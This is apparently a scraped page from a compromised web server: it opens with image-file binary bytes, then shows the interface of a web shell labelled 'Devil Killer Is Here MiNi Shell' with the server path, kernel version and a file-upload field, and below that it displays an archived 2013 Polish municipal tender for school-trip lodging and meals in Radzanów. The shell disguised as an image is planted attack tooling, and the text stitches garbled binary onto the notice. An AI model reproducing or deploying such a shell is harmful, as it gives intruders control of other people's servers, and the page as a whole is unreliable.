JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130313/101414-N-2013.html

<p class="kh_header"><b>Radzanów: Usługa zakwaterowania i wyżywienia na wycieczkach szkolnych realizowanych w ramach projektu -Zdobywając wiedzę rozwijamy skrzydła- realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Działanie 9.1, Poddziałanie 9.1.2</b><br>
<b>Numer ogłoszenia: 101414 - 2013; data zamieszczenia: 13.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Radzanowie , Radzanów, 26-807 Radzanów, woj. mazowieckie, tel. 048 6136362, faks 048 6136362 wew. 28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zakwaterowania i wyżywienia na wycieczkach szkolnych realizowanych w ramach projektu -Zdobywając wiedzę rozwijamy skrzydła- realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Działanie 9.1, Poddziałanie 9.1.2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje świadczenie wskazanych usług podczas następujących wycieczek szkolnych:
Wycieczka dla uczniów ze szkół podstawowych w Rogolinie i Czarnocinie
Termin wycieczki: 10.06.2013 r.  do 14.06.2013 r. 5 dni (4 noclegi)
Zakwaterowanie i wyżywienie w miejscowości Augustów lub okolice
Wycieczka dla uczniów szkoły podstawowej w Bukównie
Termin wycieczki: 04.07.2013 r.  do 08.07.2013 r. 5 dni (4 noclegi)
Zakwaterowanie i wyżywienie w okolicach Kielc
Wycieczka dla uczniów gimnazjum w Rogolinie
Termin wycieczki: 15.07.2013 r.  do 19.07.2013 r. 5 dni (4 noclegi)
Zakwaterowanie i wyżywienie w miejscowości Szklarska Poręba lub okolice
Usługa będzie realizowana w trzech częściach:.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy i doświadczenia, zgodnie z opisem przedmiotu zamówienia pkt. III SIWZ, a także Wykonawcy, którzy posiadają:uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; niezbędną wiedzę i doświadczenie oraz dysponuję potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć;  Wykaz wykonanych usług w okresie ostatnich 3 lat (załącznik nr 2), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich daty i miejsca. Zamawiający uzna warunek za spełniony jeżeli wykonawca wykonał 5 usług związanych z organizacją zakwaterowania wraz z wyżywieniem grup zorganizowanych:
Część I dla minimum 50 uczestników i ich opiekunów (w wykazie należy podać informacje określone w warunku). Do każdej pozycji wykazu musi być załączony dokument potwierdzający należyte wykonanie zamówienia. 
Część II dla minimum 25 uczestników i ich opiekunów (w wykazie należy podać informacje określone w warunku) Do każdej pozycji wykazu musi być załączony dokument potwierdzający należyte wykonanie zamówienia. 
Część III dla minimum 25 uczestników i ich opiekunów (w wykazie należy podać informacje określone w warunku). Do każdej pozycji wykazu musi być załączony dokument potwierdzający należyte wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis ośrodka, w którym mają być zakwaterowani uczestnicy wycieczek  pod kątem jego wyposażenia i zaplecza technicznego, wraz z pisemnym zapewnieniem podmiotu prowadzącego ośrodek o gotowości udostępnienia go wykonawcy, w terminach wskazanych przez zamawiającego lub umowę przedwstępną z takim podmiotem - jeżeli wykonawca nie prowadzi własnego ośrodka</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia spełniania warunku nie podlegania wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 ustawy - dotyczy podmiotów krajowych i zagranicznych - należy przedłożyć:oświadczenie o braku podstaw wykluczenia (załącznik nr 3 SIWZ),
Oświadczenie, iż przed przystąpieniem do przetargu osoba zapoznała się z warunkami realizacji zadania określonymi w SIWZ i formularzu umowy oraz, że uwzględniła je w ofercie i przyjmuje je bez zastrzeżeń (załącznik nr 4 SIWZ).
Zaparafowany projekt umowy (załącznik nr 5 SIWZ).  
Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP (załącznik nr 6 SIWZ)
Inne dokumenty wymagane od Wykonawców 
Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej -
stanowiąca  (załącznik nr 7 SIWZ)
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty, o których mowa w § 2 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 31 grudnia 2009 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. Nr 226, poz. 1817).
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie treści złożonych oświadczeń i dokumentów, według formuły: SPEŁNIA - NIE SPEŁNIA
Nie spełnienie chociażby jednego warunku postawionego w niniejszej Specyfikacji Istotnych Warunków Zamówienia skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony w następujących przypadkach:jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,jeżeli zajdzie koniczność przedłużenia okresu realizacji projektu, stosownie do zmian harmonogramu rzeczowo - finansowego. Termin realizacji umowy wydłużą się o okres wydłużenia realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugradzanow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Radzanów, 26 - 807 Radzanów 92 A,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2013 godzina 10:00, miejsce: Urząd Gminy Radzanów, 26 - 807 Radzanów 92 A, sekretariat (pokój nr 17).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w ramach projektu -Zdobywając wiedzę rozwijamy skrzydła-realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Działanie 9.1, Poddziałanie 9.1.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa zakwaterowania i wyżywienia dla uczniów Publicznej Szkoły Podstawowej w Czarnocinie oraz Publicznej Szkoły Podstawowej w Rogolinie podczas wycieczki szkolnej do Augustowa..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakwaterowanie i wyżywienie w Augustowie 
Termin realizacji zamówienia: od 10.06.2013 r.  do 14.06.2013 r. 5 dni (4 noclegi)
Zakwaterowanie: 
Miejsce zakwaterowania: Augustów lub okolice - położone w granicach administracyjnych miasta. Otoczenie ośrodka sprzyjające integracji grupy i wypoczynkowi.
Planowana ilość osób do zakwaterowania: 64 (58 uczniów + 6 os. dorosłych). Zamawiający zastrzega możliwość dokonania zmian ilościowych.
Cena zakwaterowani winna obejmować opłatę klimatyczną (jeżeli dotyczy).
Zakwaterowanie winno odbywać się w budynkach murowanych. Budynek, w którym zostanie zakwaterowana grupa wycieczkowa nie może być w trakcie prac remontowo-budowlanych przez cały okres trwania usługi. 
Standard zakwaterowania: hotel, pensjonat, domy wycieczkowe.
Pokoje: 1, 2, 3-osobowe. W każdym pokoju łazienka z pełnym węzłem sanitarnym (toaleta, umywalka, prysznic lub wanna), telewizor i dostęp do Internetu oraz szafa z półkami i wieszakami (odpowiednia gabarytowo do ilości zakwaterowanych) i szafki nocne przy łóżkach. Całodobowy dostęp do ciepłej i zimnej wody.
Pokoje z łóżkami jednoosobowymi wraz z pościelą.
Wykonawca musi zapewnić podział pomieszczeń ze względu na płeć. 
Pokoje czyste, sprzęt niewyeksploatowany.
Obiekt noclegowy musi zapewnić parking dla autokarów, cena parkingu w cenie usługi.
Zakwaterowanie musi się odbywać w obiekcie spełniającym warunki bezpieczeństwa - obiekt, w którym ma być zorganizowany pobyt musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno - sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, państwowej Inspekcji Sanitarnej i ochronie środowiska. 
W celu zapewnienia bezpieczeństwa uczestników wycieczki budynek noclegowy powinien być tak zabezpieczony aby uniemożliwić wejście / wyjście po godzinie 22.00 (np. recepcja bądź monitorowanie całodobowe, ewentualnie możliwość  zamknięcia budynku ).
Zamawiający wymaga, aby Wykonawca załączył do oferty szczegółowy opis miejsca wykonywania zamówienia i warunków zakwaterowania wraz z dokumentacją zdjęciową. 
Wyżywienie: 
Planowana ilość osób do wyżywienia: 64 (58 uczniów + 6 os. dorosłych). Zamawiający zastrzega możliwość dokonania zmian ilościowych.
Wykonawca w ramach świadczonej usługi zobowiązany jest do zapewnienia wyżywienia wg harmonogramu:
1 dzień (10.06.2013r.) - dzień przyjazdu: obiad i kolacja
2 dzień (11.06.2013r.) - śniadanie, obiad i kolacja
3 dzień (12.06.2013r.) -  śniadanie, obiad i kolacja
4 dzień (13.06.2013r.) -  śniadanie, obiad i kolacja
5 dzień - dzień powrotu (14.06.2013r.) - śniadanie, obiad i suchy prowiant na podróż
Zamawiający zastrzega możliwość zamiany w danym dniu wycieczki obiadu i kolacji na obiadokolację plus suchy prowiant, w zależności od harmonogramu wycieczki. Wykonawca o zmianie zostanie poinformowany przez kierownika wycieczki najpóźniej w pierwszym dniu pobytu grupy. 
Planowana łączna liczba posiłków podczas realizacji usługi (podane ilości są ilościami szacunkowymi, zamawiający zastrzega możliwość zmian ilości posiłków):
4 śniadania w formie szwedzkiego stołu (przykładowe śniadanie: jajecznica na maśle, jajka sadzone, parówki na gorąco, półmisek sera, sery topione, półmisek wędlin, jajko w majonezie, twarożek ze szczypiorkiem, pasta jajeczna, jogurt, płatki kukurydziane, mleko, masło, dżem, miód porcjowane, świeże pieczywo mieszane, soki, woda mineralna, kawa, herbata  (1 śniadanie obejmuje wszystkich uczestników wycieczki - 64 osoby); 
4 obiady: dwa dania (zupa w wazach + drugie danie, np. ziemniaki lub frytki, kasza gryczana, kluski lub makaron (do wyboru) surówka z warzyw świeżych, porcja mięsa: kotlet schabowy, gulasz, ryba smażona (filet), filet z kurczaka) + napój (woda, sok) + deser + herbata i kawa;
4 kolacje w formie szwedzkiego stołu - menu przykładowe podobne do śniadania
dodatkowo w ostatnim dniu wycieczki suchy prowiant dla wszystkich uczestników wycieczki - 64 porcje
Uczestnicy przez cały pobyt muszą mieć dostęp do wody mineralnej.
Świadczenie usługi winno się odbywać w miejscu zakwaterowania i w miejscu do tego przystosowanym np. stołówka. 
Posiłki podczas całego pobytu winny być zróżnicowane, nie dopuszcza się powtarzalność tej samej potrawy. W całodziennym jadłospisie powinny zostać uwzględnione produkty ze wszystkich grup spożywczych.
Posiłki mają być sporządzane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. Muszą być wykonywane w dniu dostawy ze świeżych artykułów spożywczych posiadających aktualne daty ważności. Czas pomiędzy przygotowaniem posiłków, a jego spożyciem nie powinien być dłuższy niż 2 godziny.
Wartość kaloryczna całodniowego posiłku musi być zgodna z zasadami żywienia. 
Wszelkie posiłki powinny być przygotowane zgodnie z obowiązującymi normami żywieniowymi wg Instytutu Żywienia i Żywności, jak również przepisami prawa w zakresie higieny żywienia norm HCCAP. Wykonawca musi posiadać pozytywną opinię pokontrolną Sanepid oraz mieć wdrożony HACCP.
Miejsce w którym będą podawane posiłki musi być przystosowane do żywienia zbiorowego dzieci i młodzieży. 
Wykonawca będzie zobowiązany do pobierania i przechowywania próbek wszystkich potraw wchodzących w skład każdego posiłku zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 17.04.2007r. w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego (Dz. U. z 2007, Nr 80, poz. 545).
Wykonawca dostarczy zestawienie potwierdzające ilość dostarczonych posiłków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa zakwaterowania i wyżywienia dla uczniów szkoły podstawowej w Bukównie w czasie wycieczki w okolice Kielc (Góry Świętokrzyskie).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakwaterowanie i wyżywienie,Termin realizacji zamówienia: 
od 04.07.2013 r.  do 08.07.2013 r. 5 dni (4 noclegi)
Zakwaterowanie: Miejsce zakwaterowania: miejscowość w okolicach Kielc - położone do 30 km od miasta. Pokoje  największe 4 osobowe z łazienkami, telewizorem, łóżka pojedyncze. Możliwość dostępu do Internetu w ośrodku dla uczestników wycieczki. Otoczenie ośrodka spokojne i bezpieczne dla dzieci, sprzyjające integracji grupy i wypoczynkowi: boisko, plac zabaw, miejsce na ognisko. W samym miejscu zakwaterowania możliwość korzystania z gier w tenis stołowy, bilard, piłkarzyki - wliczone w koszt zakwaterowania. Uczestnicy wycieczki zostaną zakwaterowani na jednym poziomie (piętrze).
Planowana ilość osób do zakwaterowania: 29 osób (25 uczniów (dziewcząt 14 i 11 chłopców) + 4 os. dorosłe). Zamawiający zastrzega możliwość dokonania zmian ilościowych.
Wyżywienie: 
Planowana ilość osób do wyżywienia: 29 osób.
Zamawiający zastrzega możliwość dokonania zmian ilościowych.
Wykonawca w ramach świadczonej usługi zobowiązany jest do zapewnienia wyżywienia wg harmonogramu:
1 dzień (04.07.2013r.) - dzień przyjazdu: obiadokolacja (dwa dania + kompot, napój)
2 dzień (05.07.2013r.) - śniadanie na zasadzie -szwedzkiego stołu- i możliwość zabrania ze sobą kanapki;  obiadokolacja (dwa dania, kompot); ognisko z kiełbaskami
3 dzień (06.07.2013r.) -  - śniadanie na zasadzie-szwedzkiego stołu- i możliwość zabrania ze sobą kanapki;  obiadokolacja (dwa dania, kompot, deser)
4 dzień (07.07.2013r.) -  - śniadanie na zasadzie -szwedzkiego stołu- i możliwość zabrania ze sobą kanapki;  obiadokolacja (dwa dania, kompot, deser)
5 dzień - dzień powrotu (08.07.2013r.) - śniadanie na zasadzie -szwedzkiego stołu-, suchy prowiant na podróż + soczek
Zamawiający zastrzega możliwość jednorazowej zamiany w  dniu wycieczki obiadokolacji na obiad  i kolację, w zależności od harmonogramu wycieczki. Wykonawca o zmianie zostanie poinformowany przez kierownika wycieczki najpóźniej w drugim dniu pobytu grupy. 
Planowana łączna liczba posiłków podczas realizacji usługi (podane ilości są ilościami szacunkowymi, zamawiający zastrzega możliwość zmian ilości posiłków):
4 śniadania w formie szwedzkiego stołu (przykładowe śniadanie: jajecznica na maśle, jajka sadzone, parówki na gorąco, półmisek sera, sery topione, półmisek wędlin, jajko w majonezie, twarożek ze szczypiorkiem, pasta jajeczna, jogurt, płatki kukurydziane, mleko, masło, dżem, miód porcjowane, świeże pieczywo mieszane, soki, woda mineralna, kawa, herbata  (1 śniadanie obejmuje wszystkich uczestników wycieczki - 29 osób); 
4 obiadokolacje: dwa dania (zupa w wazach + drugie danie)  + napój, kompot (woda, sok) + deser + herbata i kawa;
Dodatkowo w ostatnim dniu wycieczki suchy prowiant dla wszystkich uczestników wycieczki - 29 porcji
Świadczenie usługi winno się odbywać w miejscu zakwaterowania i w miejscu do tego przystosowanym np. stołówka. 
Posiłki podczas całego pobytu winny być zróżnicowane, nie dopuszcza się powtarzalność tej samej potrawy. W całodziennym jadłospisie powinny zostać uwzględnione produkty ze wszystkich grup spożywczych.
Posiłki mają być sporządzane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. Muszą być wykonywane w dniu dostawy ze świeżych artykułów spożywczych posiadających aktualne daty ważności. Czas pomiędzy przygotowaniem posiłków, a jego spożyciem nie powinien być dłuższy niż 2 godziny.
Wartość kaloryczna całodniowego posiłku musi być zgodna z zasadami żywienia. 
Wszelkie posiłki powinny być przygotowane zgodnie z obowiązującymi normami żywieniowymi wg Instytutu Żywienia i Żywności, jak również przepisami prawa w zakresie higieny żywienia norm HCCAP. Wykonawca musi posiadać pozytywną opinię pokontrolną Sanepid oraz mieć wdrożony HACCP.
Miejsce w którym będą podawane posiłki musi być przystosowane do żywienia zbiorowego dzieci i młodzieży. 
Wykonawca będzie zobowiązany do pobierania i przechowywania próbek wszystkich potraw wchodzących w skład każdego posiłku zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 17.04.2007r. w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego (Dz. U. z 2007, Nr 80, poz. 545).
Wykonawca dostarczy zestawienie potwierdzające ilość dostarczonych posiłków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa zakwaterowania i wyżywienia dla uczniów gimnazjum w Rogolinie podczas wycieczki w okolice Szklarskiej Poręby..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakwaterowanie i wyżywienie w Szklarskiej Porębie
Termin realizacji zamówienia: 
od 15.07.2013 r.  do 19.07.2013 r. 5 dni (4 noclegi)
Zakwaterowanie: 
Miejsce zakwaterowania: Szklarska Poręba lub okolice - położone nie dalej niż 12 km od centrum miasta. Otoczenie ośrodka sprzyjające integracji grupy i wypoczynkowi. Hotel powinien znajdować się w ustronnym miejscu - z dala od ruchu ulicznego - w celu zapewnieniami bezpieczeństwa uczniom.
Planowana ilość osób do zakwaterowania: 27 (24 uczniów + 3 os. dorosłe). Zamawiający zastrzega możliwość dokonania zmian ilościowych.
Zakwaterowanie winno odbywać się w budynkach murowanych,  dopuszcza się budownictwo drewniane,  przeznaczone do całorocznego zamieszkiwania. 
Cała grupa wycieczkowa musi być zakwaterowana w jednym budynku.
